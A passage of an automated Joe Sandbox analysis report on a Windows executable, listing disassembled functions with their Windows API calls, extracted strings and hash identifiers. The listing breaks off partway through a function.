                                        • Associated: 00000000.00000002.2022207686.0000000000CB2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2022261060.0000000000CBC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2022283221.0000000000CC4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_bf0000_DSD876543456780000.jbxd
                                        Similarity
                                        • API ID: _wcslen$BuffCharLower
                                        • String ID: cdecl$none$stdcall$winapi
                                        • API String ID: 707087890-567219261
                                        • Opcode ID: 49d263d48d1493131371cb37c18df5956265fd3905e9c0751641fc18ef3eaca1
                                        • Instruction ID: 7612eba72d6cf11cd37408812b0cbb7ff39b7b7920f9a73c3281e84be8e2f0bb
                                        • Opcode Fuzzy Hash: 49d263d48d1493131371cb37c18df5956265fd3905e9c0751641fc18ef3eaca1
                                        • Instruction Fuzzy Hash: 1051D435A401169BCF24DF68C8459BEB7A5BF65760B208229EA29E72C0DB30DE48C790
                                        Function 00C7372C Relevance: 15.9, APIs: 6, Strings: 3, Instructions: 187comCOMMON
                                        Download Yara Rule
                                        APIs
                                        • CoInitialize.OLE32 ref: 00C73774
                                        • CoUninitialize.OLE32 ref: 00C7377F
                                        • CoCreateInstance.OLE32(?,00000000,00000017,00C8FB78,?), ref: 00C737D9
                                        • IIDFromString.OLE32(?,?), ref: 00C7384C
                                        • VariantInit.OLEAUT32(?), ref: 00C738E4
                                        • VariantClear.OLEAUT32(?), ref: 00C73936
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2022144138.0000000000BF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BF0000, based on PE: true
                                        • Associated: 00000000.00000002.2022114283.0000000000BF0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2022207686.0000000000C8C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2022207686.0000000000CB2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2022261060.0000000000CBC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2022283221.0000000000CC4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_bf0000_DSD876543456780000.jbxd
                                        Similarity
                                        • API ID: Variant$ClearCreateFromInitInitializeInstanceStringUninitialize
                                        • String ID: Failed to create object$Invalid parameter$NULL Pointer assignment
                                        • API String ID: 636576611-1287834457
                                        • Opcode ID: 6951af25de7be06b2139fb480bb7e69a63b6c813c4e93210afc1cfc4989abbbb
                                        • Instruction ID: 503d5b4603d770bb3181eb5b316e31d5cc7afae1cba321e1329d23c6da9fbbc4
                                        • Opcode Fuzzy Hash: 6951af25de7be06b2139fb480bb7e69a63b6c813c4e93210afc1cfc4989abbbb
                                        • Instruction Fuzzy Hash: 0161B170608341AFD310DF54C889F6AB7E8EF89710F10895AF9999B291C770EE48DB97
                                        Function 00C63388 Relevance: 15.9, APIs: 3, Strings: 6, Instructions: 149COMMON
                                        Download Yara Rule
                                        APIs
                                        • LoadStringW.USER32(00000066,?,00000FFF,?), ref: 00C633CF
                                          • Part of subcall function 00BF9CB3: _wcslen.LIBCMT ref: 00BF9CBD
                                        • LoadStringW.USER32(00000072,?,00000FFF,?), ref: 00C633F0
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2022144138.0000000000BF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BF0000, based on PE: true
                                        • Associated: 00000000.00000002.2022114283.0000000000BF0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2022207686.0000000000C8C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2022207686.0000000000CB2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2022261060.0000000000CBC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2022283221.0000000000CC4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_bf0000_DSD876543456780000.jbxd
                                        Similarity
                                        • API ID: LoadString$_wcslen
                                        • String ID: Error: $"%s" (%d) : ==> %s:$"%s" (%d) : ==> %s:%s%s$Incorrect parameters to object property !$Line %d (File "%s"):$^ ERROR
                                        • API String ID: 4099089115-3080491070
                                        • Opcode ID: b2ad512e38e14a5bb35b96e1763d81ce3b1650280aa9656ed5dbc1eb67b97099
                                        • Instruction ID: 8916331e300be8109fbf0763db4badaff899db076c6b0baa0aaa2c92db48b322
                                        • Opcode Fuzzy Hash: b2ad512e38e14a5bb35b96e1763d81ce3b1650280aa9656ed5dbc1eb67b97099
                                        • Instruction Fuzzy Hash: D1517F71900259AADF15EBA0CD82EFEB7B8EF04740F1440A5F605730A2EB356F98DB64
                                        Function 00C5B5C8 Relevance: 15.9, APIs: 5, Strings: 4, Instructions: 142COMMON
                                        Download Yara Rule
                                        APIs
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2022144138.0000000000BF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BF0000, based on PE: true
                                        • Associated: 00000000.00000002.2022114283.0000000000BF0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2022207686.0000000000C8C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2022207686.0000000000CB2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2022261060.0000000000CBC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2022283221.0000000000CC4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_bf0000_DSD876543456780000.jbxd
                                        Similarity
                                        • API ID: _wcslen$BuffCharUpper
                                        • String ID: APPEND$EXISTS$KEYS$REMOVE
                                        • API String ID: 1256254125-769500911
                                        • Opcode ID: 32901c4ea220342a7d80aa1dc879fe0eda7ad0e734f255b56a8b3d74e2c54b39
                                        • Instruction ID: 2ea4f64a50bfa616e600ce8e7615a6bef04840e3b21e6d8146ccc23d0375daad
                                        • Opcode Fuzzy Hash: 32901c4ea220342a7d80aa1dc879fe0eda7ad0e734f255b56a8b3d74e2c54b39
                                        • Instruction Fuzzy Hash: 1341F436A000279ACB245F7DC8905BEBBA5AFA0795B244129FC31DB284EB35CEC5C790
                                        Function 00C65393 Relevance: 15.9, APIs: 4, Strings: 5, Instructions: 103COMMON
                                        Download Yara Rule
                                        APIs
                                        • SetErrorMode.KERNEL32(00000001), ref: 00C653A0
                                        • GetDiskFreeSpaceW.KERNEL32(?,?,?,?,?,00000002,00000001), ref: 00C65416
                                        • GetLastError.KERNEL32 ref: 00C65420
                                        • SetErrorMode.KERNEL32(00000000,READY), ref: 00C654A7
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2022144138.0000000000BF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BF0000, based on PE: true
                                        • Associated: 00000000.00000002.2022114283.0000000000BF0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2022207686.0000000000C8C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2022207686.0000000000CB2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2022261060.0000000000CBC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2022283221.0000000000CC4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_bf0000_DSD876543456780000.jbxd
                                        Similarity
                                        • API ID: Error$Mode$DiskFreeLastSpace
                                        • String ID: INVALID$NOTREADY$READONLY$READY$UNKNOWN
                                        • API String ID: 4194297153-14809454
                                        • Opcode ID: 9e3cdad8c2ba08fb6721c92e4fab64c89c6ccbbeb3fba4a58721ec0329db751f
                                        • Instruction ID: 7d6972a3a68827992ebbbf60432a634ab6b4da94606f11edb6ef633f96cccb70
                                        • Opcode Fuzzy Hash: 9e3cdad8c2ba08fb6721c92e4fab64c89c6ccbbeb3fba4a58721ec0329db751f
                                        • Instruction Fuzzy Hash: 17319275A006059FCB20DF68C4C4BBE7BB4EF45305F2480A5E515CB292DB71DE86CBA0
                                        Function 00C83C46 Relevance: 15.9, APIs: 7, Strings: 2, Instructions: 101windowCOMMON
                                        Download Yara Rule
                                        APIs
                                        • CreateMenu.USER32 ref: 00C83C79
                                        • SetMenu.USER32(?,00000000), ref: 00C83C88
                                        • GetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 00C83D10
                                        • IsMenu.USER32(?), ref: 00C83D24
                                        • CreatePopupMenu.USER32 ref: 00C83D2E
                                        • InsertMenuItemW.USER32(?,?,00000001,00000030), ref: 00C83D5B
                                        • DrawMenuBar.USER32 ref: 00C83D63
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2022144138.0000000000BF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BF0000, based on PE: true
                                        • Associated: 00000000.00000002.2022114283.0000000000BF0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2022207686.0000000000C8C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2022207686.0000000000CB2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2022261060.0000000000CBC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2022283221.0000000000CC4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_bf0000_DSD876543456780000.jbxd
                                        Similarity
                                        • API ID: Menu$CreateItem$DrawInfoInsertPopup
                                        • String ID: 0$F
                                        • API String ID: 161812096-3044882817
                                        • Opcode ID: 0a5aef987344ff916f6ed3dd255382bed4c0f0593f25f990e3d5846815a21887
                                        • Instruction ID: 3bd12c79ae67c823db8416f159d4218bd33a3b26de513f36c1c985c34547b1ee
                                        • Opcode Fuzzy Hash: 0a5aef987344ff916f6ed3dd255382bed4c0f0593f25f990e3d5846815a21887
                                        • Instruction Fuzzy Hash: 64418A75A01209AFDF14DF64D888FAE7BB5FF4A354F144029E91697360D730AA10DBA8
                                        Function 00C51EDF Relevance: 15.8, APIs: 7, Strings: 2, Instructions: 78windowCOMMON
                                        Download Yara Rule
                                        APIs
                                          • Part of subcall function 00BF9CB3: _wcslen.LIBCMT ref: 00BF9CBD
                                          • Part of subcall function 00C53CA7: GetClassNameW.USER32(?,?,000000FF), ref: 00C53CCA
                                        • SendMessageW.USER32(?,0000018C,000000FF,00020000), ref: 00C51F64
                                        • GetDlgCtrlID.USER32 ref: 00C51F6F
                                        • GetParent.USER32 ref: 00C51F8B
                                        • SendMessageW.USER32(00000000,?,00000111,?), ref: 00C51F8E
                                        • GetDlgCtrlID.USER32(?), ref: 00C51F97
                                        • GetParent.USER32(?), ref: 00C51FAB
                                        • SendMessageW.USER32(00000000,?,00000111,?), ref: 00C51FAE
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2022144138.0000000000BF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BF0000, based on PE: true
                                        • Associated: 00000000.00000002.2022114283.0000000000BF0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2022207686.0000000000C8C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2022207686.0000000000CB2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2022261060.0000000000CBC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2022283221.0000000000CC4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_bf0000_DSD876543456780000.jbxd
                                        Similarity
                                        • API ID: MessageSend$CtrlParent$ClassName_wcslen
                                        • String ID: ComboBox$ListBox
                                        • API String ID: 711023334-1403004172
                                        • Opcode ID: 1d3180c537e531e0a8eab06b90ef77f1c7b0e2c67707eb72046f595a3c5361d1
                                        • Instruction ID: 085f37cf143438bec618aeedc776b75db3f54208fab2c518f918bb439f4828f7
                                        • Opcode Fuzzy Hash: 1d3180c537e531e0a8eab06b90ef77f1c7b0e2c67707eb72046f595a3c5361d1
                                        • Instruction Fuzzy Hash: 7E21AF74900218ABCF04AFA0DC85BFEBBB8EF05350B040255FD61A7291DB35594C9B68
                                        Function 00C83A23 Relevance: 15.2, APIs: 10, Instructions: 182windowCOMMON
                                        Download Yara Rule
                                        APIs
                                        • SendMessageW.USER32(?,0000101F,00000000,00000000), ref: 00C83A9D
                                        • SendMessageW.USER32(00000000,?,0000101F,00000000), ref: 00C83AA0
                                        • GetWindowLongW.USER32(?,000000F0), ref: 00C83AC7
                                        • SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00C83AEA
                                        • SendMessageW.USER32(?,0000104D,00000000,00000007), ref: 00C83B62
                                        • SendMessageW.USER32(?,00001074,00000000,00000007), ref: 00C83BAC
                                        • SendMessageW.USER32(?,00001057,00000000,00000000), ref: 00C83BC7
                                        • SendMessageW.USER32(?,0000101D,00001004,00000000), ref: 00C83BE2
                                        • SendMessageW.USER32(?,0000101E,00001004,00000000), ref: 00C83BF6
                                        • SendMessageW.USER32(?,00001008,00000000,00000007), ref: 00C83C13
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2022144138.0000000000BF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BF0000, based on PE: true
                                        • Associated: 00000000.00000002.2022114283.0000000000BF0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2022207686.0000000000C8C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2022207686.0000000000CB2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2022261060.0000000000CBC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2022283221.0000000000CC4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_bf0000_DSD876543456780000.jbxd
                                        Similarity
                                        • API ID: MessageSend$LongWindow
                                        • String ID:
                                        • API String ID: 312131281-0
                                        • Opcode ID: b2902b1820abb255a79638bae6ac2637fd34a0583ba3bf3e19e30412744f957e
                                        • Instruction ID: 0ecc49fc9e0a403fabce9542248c7b1ceec07f162e8a81d2805c6c7d24f5464b
                                        • Opcode Fuzzy Hash: b2902b1820abb255a79638bae6ac2637fd34a0583ba3bf3e19e30412744f957e
                                        • Instruction Fuzzy Hash: C9619BB5900248AFDB10EFA8CC81FEE77B8EF09714F140199FA15A72A2D774AE41DB54
                                        Function 00C5B12F Relevance: 15.1, APIs: 10, Instructions: 88threadCOMMON
                                        Download Yara Rule
                                        APIs
                                        • GetCurrentThreadId.KERNEL32 ref: 00C5B151
                                        • GetForegroundWindow.USER32(00000000,?,?,?,?,?,00C5A1E1,?,00000001), ref: 00C5B165
                                        • GetWindowThreadProcessId.USER32(00000000), ref: 00C5B16C
                                        • AttachThreadInput.USER32(00000000,00000000,00000001,?,?,?,?,?,00C5A1E1,?,00000001), ref: 00C5B17B
                                        • GetWindowThreadProcessId.USER32(?,00000000), ref: 00C5B18D
                                        • AttachThreadInput.USER32(?,00000000,00000001,?,?,?,?,?,00C5A1E1,?,00000001), ref: 00C5B1A6
                                        • AttachThreadInput.USER32(00000000,00000000,00000001,?,?,?,?,?,00C5A1E1,?,00000001), ref: 00C5B1B8
                                        • AttachThreadInput.USER32(00000000,00000000,?,?,?,?,?,00C5A1E1,?,00000001), ref: 00C5B1FD
                                        • AttachThreadInput.USER32(?,?,00000000,?,?,?,?,?,00C5A1E1,?,00000001), ref: 00C5B212
                                        • AttachThreadInput.USER32(00000000,?,00000000,?,?,?,?,?,00C5A1E1,?,00000001), ref: 00C5B21D
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2022144138.0000000000BF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BF0000, based on PE: true
                                        • Associated: 00000000.00000002.2022114283.0000000000BF0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2022207686.0000000000C8C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2022207686.0000000000CB2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2022261060.0000000000CBC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2022283221.0000000000CC4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_bf0000_DSD876543456780000.jbxd
                                        Similarity
                                        • API ID: Thread$AttachInput$Window$Process$CurrentForeground
                                        • String ID:
                                        • API String ID: 2156557900-0
                                        • Opcode ID: 0d449253da10fea7c0a61f0df1cfb5a2d3b5c4b2787c18f6b7fcb98ca7c3d2f4
                                        • Instruction ID: e7347f19da42c6692fb2f31a095e2f9f2f575e40ad1d5c07e83ca5debad023af
                                        • Opcode Fuzzy Hash: 0d449253da10fea7c0a61f0df1cfb5a2d3b5c4b2787c18f6b7fcb98ca7c3d2f4
                                        • Instruction Fuzzy Hash: 3B316B7A500604BFDB109F64EC88FAE7FA9BB51312F108115FE15D6190D7B89E858F78
                                        Function 00C22C80 Relevance: 15.1, APIs: 10, Instructions: 54COMMON
                                        Download Yara Rule
                                        APIs
                                        • _free.LIBCMT ref: 00C22C94
                                          • Part of subcall function 00C229C8: RtlFreeHeap.NTDLL(00000000,00000000,?,00C2D7D1,00000000,00000000,00000000,00000000,?,00C2D7F8,00000000,00000007,00000000,?,00C2DBF5,00000000), ref: 00C229DE
                                          • Part of subcall function 00C229C8: GetLastError.KERNEL32(00000000,?,00C2D7D1,00000000,00000000,00000000,00000000,?,00C2D7F8,00000000,00000007,00000000,?,00C2DBF5,00000000,00000000), ref: 00C229F0
                                        • _free.LIBCMT ref: 00C22CA0
                                        • _free.LIBCMT ref: 00C22CAB
                                        • _free.LIBCMT ref: 00C22CB6
                                        • _free.LIBCMT ref: 00C22CC1
                                        • _free.LIBCMT ref: 00C22CCC
                                        • _free.LIBCMT ref: 00C22CD7
                                        • _free.LIBCMT ref: 00C22CE2
                                        • _free.LIBCMT ref: 00C22CED
                                        • _free.LIBCMT ref: 00C22CFB
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2022144138.0000000000BF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BF0000, based on PE: true
                                        • Associated: 00000000.00000002.2022114283.0000000000BF0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2022207686.0000000000C8C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2022207686.0000000000CB2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2022261060.0000000000CBC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2022283221.0000000000CC4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_bf0000_DSD876543456780000.jbxd
                                        Similarity
                                        • API ID: _free$ErrorFreeHeapLast
                                        • String ID:
                                        • API String ID: 776569668-0
                                        • Opcode ID: 68fbccef938b145efb4dfc6862fb7d0d181bfca09bccb30ca11dbbff987577c7
                                        • Instruction ID: eb3da70e89a38aed8dbd9e46124845c6aec154366be4cf6a3d5c5ed6b56d42e7
                                        • Opcode Fuzzy Hash: 68fbccef938b145efb4dfc6862fb7d0d181bfca09bccb30ca11dbbff987577c7
                                        • Instruction Fuzzy Hash: 16118976500218BFCB02FF54E942CDD3BA5FF09350F9145A5F9495FA22D631EE90AB90
                                        Function 00BF1410 Relevance: 14.3, APIs: 7, Strings: 1, Instructions: 332comCOMMON
                                        Download Yara Rule
                                        APIs
                                        • mciSendStringW.WINMM(close all,00000000,00000000,00000000), ref: 00BF1459
                                        • OleUninitialize.OLE32(?,00000000), ref: 00BF14F8
                                        • UnregisterHotKey.USER32(?), ref: 00BF16DD
                                        • DestroyWindow.USER32(?), ref: 00C324B9
                                        • FreeLibrary.KERNEL32(?), ref: 00C3251E
                                        • VirtualFree.KERNEL32(?,00000000,00008000), ref: 00C3254B
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2022144138.0000000000BF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BF0000, based on PE: true
                                        • Associated: 00000000.00000002.2022114283.0000000000BF0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2022207686.0000000000C8C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2022207686.0000000000CB2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2022261060.0000000000CBC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2022283221.0000000000CC4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_bf0000_DSD876543456780000.jbxd
                                        Similarity
                                        • API ID: Free$DestroyLibrarySendStringUninitializeUnregisterVirtualWindow
                                        • String ID: close all
                                        • API String ID: 469580280-3243417748
                                        • Opcode ID: 64444d816515be7c9e26b544ab754b5136c8cfe6c893defdf2cd18c4bcc3ab08
                                        • Instruction ID: 5743100b3c31840e686a06c791d287830125e37dff5a9bf18681500694491dcd
                                        • Opcode Fuzzy Hash: 64444d816515be7c9e26b544ab754b5136c8cfe6c893defdf2cd18c4bcc3ab08
                                        • Instruction Fuzzy Hash: 09D16C31711212CFCB29EF19C895B29F7A4BF05700F1449EDE54AAB292DB30AD16CF54
                                        Function 00C67DF0 Relevance: 14.2, APIs: 7, Strings: 1, Instructions: 230COMMON
                                        Download Yara Rule
                                        APIs
                                        • GetCurrentDirectoryW.KERNEL32(00007FFF,?), ref: 00C67FAD
                                        • SetCurrentDirectoryW.KERNEL32(?), ref: 00C67FC1
                                        • GetFileAttributesW.KERNEL32(?), ref: 00C67FEB
                                        • SetFileAttributesW.KERNEL32(?,00000000), ref: 00C68005
                                        • SetCurrentDirectoryW.KERNEL32(?), ref: 00C68017
                                        • SetCurrentDirectoryW.KERNEL32(?), ref: 00C68060
                                        • SetCurrentDirectoryW.KERNEL32(?,?,?,?,?), ref: 00C680B0
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2022144138.0000000000BF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BF0000, based on PE: true
                                        • Associated: 00000000.00000002.2022114283.0000000000BF0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2022207686.0000000000C8C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2022207686.0000000000CB2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2022261060.0000000000CBC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2022283221.0000000000CC4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_bf0000_DSD876543456780000.jbxd
                                        Similarity
                                        • API ID: CurrentDirectory$AttributesFile
                                        • String ID: *.*
                                        • API String ID: 769691225-438819550
                                        • Opcode ID: 6b62c5b5feda4ccd49b6df1e74001ea89232c3897b4ef265f0e89a4e6ccaaeb1
                                        • Instruction ID: 135c08b5d274cc274d9dde4209b76f2573711cda7d6fc723362c0da001f4de13
                                        • Opcode Fuzzy Hash: 6b62c5b5feda4ccd49b6df1e74001ea89232c3897b4ef265f0e89a4e6ccaaeb1
                                        • Instruction Fuzzy Hash: 4881AE725082059FCB30EF55C894AAEB3E8AF88314F144E5AF995C7250EB36DE4D8B52
                                        Function 00BF5BEA Relevance: 14.2, APIs: 7, Strings: 1, Instructions: 184windowCOMMON
                                        Download Yara Rule
                                        APIs
                                        • SetWindowLongW.USER32(?,000000EB), ref: 00BF5C7A
                                          • Part of subcall function 00BF5D0A: GetClientRect.USER32(?,?), ref: 00BF5D30
                                          • Part of subcall function 00BF5D0A: GetWindowRect.USER32(?,?), ref: 00BF5D71
                                          • Part of subcall function 00BF5D0A: ScreenToClient.USER32(?,?), ref: 00BF5D99
                                        • GetDC.USER32 ref: 00C346F5
                                        • SendMessageW.USER32(?,00000031,00000000,00000000), ref: 00C34708
                                        • SelectObject.GDI32(00000000,00000000), ref: 00C34716
                                        • SelectObject.GDI32(00000000,00000000), ref: 00C3472B
                                        • ReleaseDC.USER32(?,00000000), ref: 00C34733
                                        • MoveWindow.USER32(?,?,?,?,?,?,?,00000031,00000000,00000000), ref: 00C347C4
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2022144138.0000000000BF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BF0000, based on PE: true
                                        • Associated: 00000000.00000002.2022114283.0000000000BF0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2022207686.0000000000C8C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2022207686.0000000000CB2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2022261060.0000000000CBC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2022283221.0000000000CC4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_bf0000_DSD876543456780000.jbxd
                                        Similarity
                                        • API ID: Window$ClientObjectRectSelect$LongMessageMoveReleaseScreenSend
                                        • String ID: U
                                        • API String ID: 4009187628-3372436214
                                        • Opcode ID: 7cc2b172f65cd544b88dfbdd50bd233312676c019bc1610cfcafef7730c6d5d3
                                        • Instruction ID: 46f4552703b8a65ba79cb81b06966d81c6168f781bd7e1ea6f3717ca61129e23
                                        • Opcode Fuzzy Hash: 7cc2b172f65cd544b88dfbdd50bd233312676c019bc1610cfcafef7730c6d5d3
                                        • Instruction Fuzzy Hash: D471E231400209DFCF298F64C985ABE7BB5FF4A354F144269FE665A1A6C330A945DF60
                                        Function 00C6359C Relevance: 14.2, APIs: 3, Strings: 5, Instructions: 150COMMON
                                        Download Yara Rule
                                        APIs
                                        • LoadStringW.USER32(00000066,?,00000FFF,00000000), ref: 00C635E4
                                          • Part of subcall function 00BF9CB3: _wcslen.LIBCMT ref: 00BF9CBD
                                        • LoadStringW.USER32(00CC2390,?,00000FFF,?), ref: 00C6360A
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2022144138.0000000000BF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BF0000, based on PE: true
                                        • Associated: 00000000.00000002.2022114283.0000000000BF0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2022207686.0000000000C8C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2022207686.0000000000CB2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2022261060.0000000000CBC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2022283221.0000000000CC4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_bf0000_DSD876543456780000.jbxd
                                        Similarity
                                        • API ID: LoadString$_wcslen
                                        • String ID: Error: $"%s" (%d) : ==> %s:$"%s" (%d) : ==> %s:%s%s$Line %d (File "%s"):$^ ERROR
                                        • API String ID: 4099089115-2391861430
                                        • Opcode ID: d6b44fede968ffaccde32a5f903717b05601126915c39d605bb49db415edee7f
                                        • Instruction ID: 1ad7c0b4b9bbb22204bfb0bb2db999217ec35804ac78204887a254bac445f9f7
                                        • Opcode Fuzzy Hash: d6b44fede968ffaccde32a5f903717b05601126915c39d605bb49db415edee7f
                                        • Instruction Fuzzy Hash: 95516F71800259AADF15EBA0DC82EFDBBB4EF04740F0841A5F605731A2DB305B99DF64
                                        Function 00C88B02 Relevance: 14.1, APIs: 6, Strings: 2, Instructions: 149windowCOMMON
                                        Download Yara Rule
                                        APIs
                                          • Part of subcall function 00C09BA1: GetWindowLongW.USER32(00000000,000000EB), ref: 00C09BB2
                                          • Part of subcall function 00C0912D: GetCursorPos.USER32(?), ref: 00C09141
                                          • Part of subcall function 00C0912D: ScreenToClient.USER32(00000000,?), ref: 00C0915E
                                          • Part of subcall function 00C0912D: GetAsyncKeyState.USER32(00000001), ref: 00C09183
                                          • Part of subcall function 00C0912D: GetAsyncKeyState.USER32(00000002), ref: 00C0919D
                                        • ImageList_DragLeave.COMCTL32(00000000,00000000,00000001,?,?,?,?), ref: 00C88B6B
                                        • ImageList_EndDrag.COMCTL32 ref: 00C88B71
                                        • ReleaseCapture.USER32 ref: 00C88B77
                                        • SetWindowTextW.USER32(?,00000000), ref: 00C88C12
                                        • SendMessageW.USER32(?,000000B1,00000000,000000FF), ref: 00C88C25
